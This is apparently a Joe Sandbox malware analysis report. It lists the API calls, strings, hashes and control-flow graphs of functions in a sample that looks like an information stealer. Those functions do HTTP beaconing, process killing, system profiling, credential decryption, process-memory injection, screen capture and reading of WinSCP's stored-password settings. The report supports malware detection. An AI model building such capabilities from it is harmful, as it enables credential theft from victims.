                                                                                                                                                                                                                                                                          • InternetOpenA.WININET ref: 004042E1
                                                                                                                                                                                                                                                                          • InternetConnectA.WININET ref: 0040432D
                                                                                                                                                                                                                                                                          • HttpSendRequestA.WININET ref: 0040439B
                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(00000000,?,000007CF,?,?), ref: 004043F0
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Internet$ConnectCrackFileHttpOpenReadRequestSend
                                                                                                                                                                                                                                                                          • String ID: ERROR$GET$HTTP/1.1$https
                                                                                                                                                                                                                                                                          • API String ID: 2949174142-2961588264
                                                                                                                                                                                                                                                                          • Opcode ID: 2e2f3eead9419f441d624b4b2d1e8f2e1cd83a2dda5262dd01751a01b6ddd133
                                                                                                                                                                                                                                                                          • Instruction ID: 3507938dcee9cc1a0527973a4bd5b6eba6c84462808e0f35a45f5f60c0c7131e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e2f3eead9419f441d624b4b2d1e8f2e1cd83a2dda5262dd01751a01b6ddd133
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D451D771A00319ABDB10DFA4DC85FFF7779AF84704F00452AFA05A7281DB78A985CBA5
                                                                                                                                                                                                                                                                          Function 00406FE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47fileCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00407060: strlen.MSVCRT ref: 0040708A
                                                                                                                                                                                                                                                                            • Part of subcall function 00407060: strlen.MSVCRT ref: 004070EB
                                                                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,00000000), ref: 00407009
                                                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00407041
                                                                                                                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00407059
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: strlen$??3@FileFindFirst_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                          • String ID: \LOCK
                                                                                                                                                                                                                                                                          • API String ID: 3598502236-2879356017
                                                                                                                                                                                                                                                                          • Opcode ID: 952b9b43d773132738958d387f29db73d7e192de4124f97fd59f734c76a160b2
                                                                                                                                                                                                                                                                          • Instruction ID: f44c4d4fe338d5c98bb0dd275f70c49df30f8ba6c2b9d28de0915081bc548b38
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 952b9b43d773132738958d387f29db73d7e192de4124f97fd59f734c76a160b2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CAF0D631D1811187DB1876799D45A6F72919F42730F540B3FF566B72C1E239BC80428B
                                                                                                                                                                                                                                                                          Function 00412050 Relevance: 6.1, APIs: 4, Instructions: 54processCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?,?,?,00000000,?,?,0000001C,0042150A), ref: 00412065
                                                                                                                                                                                                                                                                          • Process32First.KERNEL32(00000000,?,?,?,?,?,?,00000000,?,?,0000001C,0042150A), ref: 00412071
                                                                                                                                                                                                                                                                          • Process32Next.KERNEL32(00000000,?,?,?,?,?,?,00000000,?,?,0000001C,0042150A), ref: 0041207D
                                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,?,?,0000001C,0042150A), ref: 004120C5
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Process32$CreateFirstNextProcessSnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2465094008-0
                                                                                                                                                                                                                                                                          • Opcode ID: a0b7ef02e1583a47d1d21b47bccce1f0927895e069a30e1cc4337bfc16cdf067
                                                                                                                                                                                                                                                                          • Instruction ID: 36dad1cb0fcbca0ffdfdd7c06b199559f2c5def7befbfc21f7e452e0f853ed5d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0b7ef02e1583a47d1d21b47bccce1f0927895e069a30e1cc4337bfc16cdf067
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 93017571201214AFE7205B20BD48FBFBEADEF85781F14151DF605D6190CBA99CA1C6BA
                                                                                                                                                                                                                                                                          Function 004108B0 Relevance: 4.5, APIs: 3, Instructions: 17memoryCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?,00401148,?,00420C50), ref: 004108B2
                                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401148,?,00420C50), ref: 004108C0
                                                                                                                                                                                                                                                                          • GetUserNameA.ADVAPI32(00000000), ref: 004108D3
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1206570057-0
                                                                                                                                                                                                                                                                          • Opcode ID: 2b361677700be1ff8942658dc204bee90d98a7bfd06238250aeafa4148f7f011
                                                                                                                                                                                                                                                                          • Instruction ID: b80074a2059a1f3756ce7d307e25dbd51f94fcbc115dd2ec99a1d9f33b013242
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b361677700be1ff8942658dc204bee90d98a7bfd06238250aeafa4148f7f011
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66D0A7F17012106BD6206764BC4DBC7395C9F05760F440021F981C62A0C27448C1C695
                                                                                                                                                                                                                                                                          Function 004109F0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 105COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200), ref: 00410A4D
                                                                                                                                                                                                                                                                            • Part of subcall function 00411270: memset.MSVCRT ref: 00411281
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InfoLocalememset
                                                                                                                                                                                                                                                                          • String ID: /
                                                                                                                                                                                                                                                                          • API String ID: 25785879-4001269591
                                                                                                                                                                                                                                                                          • Opcode ID: 47d8d58765390bafa4d4b739f7cf5a28c409f74912168362484b764a7be3d9a5
                                                                                                                                                                                                                                                                          • Instruction ID: eea5c3a77f3b4bcccf0633d63ef4e7b0d3230a8af430361ee2a26d3609cb3d8b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 47d8d58765390bafa4d4b739f7cf5a28c409f74912168362484b764a7be3d9a5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5831A8313043186BD7106B919C89FAF779DEB85748F00051EF9469B291DABCAD8487A9
                                                                                                                                                                                                                                                                          Function 00410990 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32timeCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00417920,?,?,?,?), ref: 004109B2
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InformationTimeZone
                                                                                                                                                                                                                                                                          • String ID: wwww
                                                                                                                                                                                                                                                                          • API String ID: 565725191-671953474
                                                                                                                                                                                                                                                                          • Opcode ID: d02d355f946309d5fb77ffe609dd2dd317ed8e5471a32a046b4ab4715d77f78c
                                                                                                                                                                                                                                                                          • Instruction ID: 9378462ab9666fb6dba0cc2dba94d0b141e63b92265a990e46b9389926462d0e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d02d355f946309d5fb77ffe609dd2dd317ed8e5471a32a046b4ab4715d77f78c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5F02BB1B001105BE704573CBC0AB6A365A4BC6314F1A8225F591DF3E4DE749C5187C5
                                                                                                                                                                                                                                                                          Function 00410BA0 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?), ref: 00410BAA
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InfoSystem
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 31276548-0
                                                                                                                                                                                                                                                                          • Opcode ID: 180fdf943f679f0908199cc39e44e1d0c0beb04e4c0ad37296b993fdceb6a780
                                                                                                                                                                                                                                                                          • Instruction ID: 2046fac39060b3b77728db7903071d1a84601050c9d96548d090f17622b8ad63
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 180fdf943f679f0908199cc39e44e1d0c0beb04e4c0ad37296b993fdceb6a780
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6AD0237160012097C7002B18FD4D98737545FC1708F010111F745B7151D135996E87DF
                                                                                                                                                                                                                                                                          Function 004188E0 Relevance: 222.8, APIs: 7, Strings: 120, Instructions: 518libraryCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 0 4188e0-4188e7 1 418d02-418d99 LoadLibraryA * 7 0->1 2 4188ed-418cfd call 404df0 * 50 0->2 9 418e04-418e0b 1->9 10 418d9b-418dff 1->10 2->1 12 418e11-418eb7 9->12 13 418ebc-418ec3 9->13 10->9 12->13 16 418ec5-418f29 13->16 17 418f2e-418f35 13->17 16->17 21 418f37-418fb1 17->21 22 418fb6-418fbd 17->22 21->22 26 418fc3-41907f 22->26 27 419084-41908b 22->27 26->27 28 4190f6-4190fd 27->28 29 41908d-4190f1 27->29 36 419126-41912d 28->36 37 4190ff-419121 28->37 29->28 41 419156-41915d 36->41 42 41912f-419151 36->42 37->36 47 419163-419235 41->47 48 41923a-419241 41->48 42->41 47->48 57 419243-419291 48->57 58 419296-41929d 48->58 57->58 61 4192b0-4192b7 58->61 62 41929f-4192ab 58->62 70 4192b9-419307 61->70 71 41930c-419313 61->71 62->61 70->71 76 419315-419321 71->76 77 419326 71->77 76->77
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(gdiplus.dll,00417538), ref: 00418D07
                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(ole32.dll), ref: 00418D17
                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(bcrypt.dll), ref: 00418D27
                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(wininet.dll), ref: 00418D37
                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(psapi.dll), ref: 00418D67
                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(rstrtmgr.dll), ref: 00418D77
                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00418D87
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                                                                          • String ID: BCryptCloseAlgorithmProvider$BCryptDecrypt$BCryptDestroyKey$BCryptGenerateSymmetricKey$BCryptOpenAlgorithmProvider$BCryptSetProperty$BitBlt$CharToOemW$CloseWindow$CoCreateInstance$CoInitialize$CoUninitialize$CopyFileA$CreateCompatibleBitmap$CreateCompatibleDC$CreateFileA$CreateProcessA$CreateStreamOnHGlobal$CreateToolhelp32Snapshot$CryptBinaryToStringA$CryptUnprotectData$DeleteFileA$DeleteObject$EnumDisplayDevicesA$FindClose$FindFirstFileA$FindNextFileA$FreeLibrary$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipFree$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$GdiplusShutdown$GdiplusStartup$GetCurrentProcessId$GetDC$GetDesktopWindow$GetEnvironmentVariableA$GetFileAttributesA$GetFileSize$GetFileSizeEx$GetHGlobalFromStream$GetKeyboardLayoutList$GetLastError$GetLocalTime$GetLocaleInfoA$GetLogicalProcessorInformationEx$GetModuleFileNameA$GetModuleFileNameExA$GetSystemPowerStatus$GetThreadContext$GetTimeZoneInformation$GetUserDefaultLocaleName$GetVolumeInformationA$GetWindowRect$GetWindowsDirectoryA$GlobalAlloc$GlobalFree$GlobalLock$GlobalSize$HeapFree$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetCrackUrlA$InternetOpenA$InternetOpenUrlA$InternetReadFile$InternetSetOptionA$IsWow64Process$LocalAlloc$LocalFree$MultiByteToWideChar$OpenProcess$PathMatchSpecA$Process32First$Process32Next$ReadProcessMemory$RegCloseKey$RegEnumKeyExA$RegEnumValueA$RegOpenKeyExA$RegQueryValueExA$ResumeThread$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$SHGetFolderPathA$SelectObject$SetEnvironmentVariableA$SetFilePointer$SetThreadContext$ShellExecuteExA$StrCmpCA$StrCmpCW$StrStrA$SymMatchString$TerminateProcess$VirtualAllocEx$VirtualProtect$WideCharToMultiByte$WriteFile$WriteProcessMemory$bcrypt.dll$dbghelp.dll$gdiplus.dll$lstrcpynA$ole32.dll$psapi.dll$rstrtmgr.dll$shell32.dll$shlwapi.dll$wininet.dll$wsprintfA$wsprintfW
                                                                                                                                                                                                                                                                          • API String ID: 1029625771-859426583
                                                                                                                                                                                                                                                                          • Opcode ID: e334bc535a13e97accdcf64ac2a3aa2131f507ae42f1c63ed7f53eac5600871f
                                                                                                                                                                                                                                                                          • Instruction ID: 0a0f86706a4d50df5c0891041486815c3a2fdb24875638c890ef6a63e7135bce
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e334bc535a13e97accdcf64ac2a3aa2131f507ae42f1c63ed7f53eac5600871f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0032D6B0A41B50AFD7116F61FD06B257AA3FB85705354603BB802972B2DBBA1850EFD8
                                                                                                                                                                                                                                                                          Function 0040D080 Relevance: 93.5, APIs: 50, Strings: 3, Instructions: 788stringmemoryregistryCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 0040D09D
                                                                                                                                                                                                                                                                          • strchr.MSVCRT ref: 0040D0B6
                                                                                                                                                                                                                                                                          • strchr.MSVCRT ref: 0040D0CE
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 0040D0EA
                                                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040D130
                                                                                                                                                                                                                                                                          • strcpy_s.MSVCRT ref: 0040D184
                                                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D1CD
                                                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D21F
                                                                                                                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0040D244
                                                                                                                                                                                                                                                                          • strcpy_s.MSVCRT ref: 0040D2D6
                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D2EC
                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D322
                                                                                                                                                                                                                                                                          • strcpy_s.MSVCRT ref: 0040D34E
                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D364
                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D38F
                                                                                                                                                                                                                                                                          • strcpy_s.MSVCRT ref: 0040D3B7
                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D3CD
                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D3EE
                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D419
                                                                                                                                                                                                                                                                          • strcpy_s.MSVCRT ref: 0040D44B
                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?), ref: 0040D461
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0040D468
                                                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040D4B6
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 0040D4CE
                                                                                                                                                                                                                                                                          • strcpy_s.MSVCRT ref: 0040D50C
                                                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D559
                                                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D5BB
                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D5CD
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0040D5D4
                                                                                                                                                                                                                                                                          • strcpy_s.MSVCRT ref: 0040D602
                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D614
                                                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040D65C
                                                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,0042150A,00000000), ref: 0040D7C4
                                                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,0042150A,00000000), ref: 0040D811
                                                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000), ref: 0040D883
                                                                                                                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(0042150A,00000000), ref: 0040D9A7
                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040D9DD
                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040D9FA
                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040DA10
                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040DA26
                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0040DA55
                                                                                                                                                                                                                                                                          • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,00000004), ref: 0040DA7F
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • Security, xrefs: 0040DA77
                                                                                                                                                                                                                                                                          • Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 0040DA4B
                                                                                                                                                                                                                                                                          • UseMasterPassword, xrefs: 0040DA72
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FreeHeap$??3@strcpy_s$lstrlen$memset$strlen$_invalid_parameter_noinfo_noreturnstrchr$OpenValue
                                                                                                                                                                                                                                                                          • String ID: Security$Software\Martin Prikryl\WinSCP 2\Configuration$UseMasterPassword
                                                                                                                                                                                                                                                                          • API String ID: 1294003985-1988659312
                                                                                                                                                                                                                                                                          • Opcode ID: 70b48f79dde87d68d958232ae859ffb282ceefb322202551e63ed2134ea11841
                                                                                                                                                                                                                                                                          • Instruction ID: 45027c83fb9c17c7e498a7fe32e666c7a7efeb05010239fc81dc07cf04dd4ddd
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 70b48f79dde87d68d958232ae859ffb282ceefb322202551e63ed2134ea11841
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A342C9B19043005BD710ABA5CD49B6FBBE9EF85314F04082EF986A72D1D778DC49CB9A
                                                                                                                                                                                                                                                                          Function 00418610 Relevance: 63.2, APIs: 2, Strings: 34, Instructions: 150libraryCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 1504 418610-418622 GetModuleHandleA 1505 4187e6-41883e LoadLibraryA 1504->1505 1506 418628-4187e1 call 404df0 * 21 1504->1506 1519 418840-418850 call 404df0 1505->1519 1520 418855-418857 1505->1520 1506->1505 1519->1520 1523 418859-418879 call 404df0 * 2 1520->1523 1524 41887e-418885 1520->1524 1523->1524 1529 418897-41889e 1524->1529 1530 418887-418892 call 404df0 1524->1530 1534 4188b0-4188b7 1529->1534 1535 4188a0-4188ab call 404df0 1529->1535 1530->1529 1536 4188b9-4188d9 call 404df0 * 2 1534->1536 1537 4188de 1534->1537 1535->1534 1536->1537
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,004185CA), ref: 00418615
                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(crypt32.dll), ref: 0041881B
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: HandleLibraryLoadModule
                                                                                                                                                                                                                                                                          • String ID: CloseHandle$CreateDCA$CreateEventA$CryptStringToBinaryA$ExitProcess$GetComputerNameA$GetCurrentProcess$GetDeviceCaps$GetProcAddress$GetProcessHeap$GetSystemInfo$GetSystemTime$GetUserDefaultLangID$GetUserNameA$GlobalMemoryStatusEx$LoadLibraryA$NtQueryInformationProcess$OpenEventA$ReleaseDC$Sleep$SystemTimeToFileTime$VirtualAlloc$VirtualAllocExNuma$VirtualFree$advapi32.dll$crypt32.dll$gdi32.dll$kernel32.dll$lstrcatA$lstrcpyA$lstrlenA$ntdll.dll$sscanf$user32.dll
                                                                                                                                                                                                                                                                          • API String ID: 4133054770-2466989068
                                                                                                                                                                                                                                                                          • Opcode ID: b0d94fdff95e889663e20a71a92f9650b874d673670a684f651acea377882e8d
                                                                                                                                                                                                                                                                          • Instruction ID: fa4f152899c94b2b2f6a7a6abf1eb692faa9c8451fb2198c09e274f393329d92
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b0d94fdff95e889663e20a71a92f9650b874d673670a684f651acea377882e8d
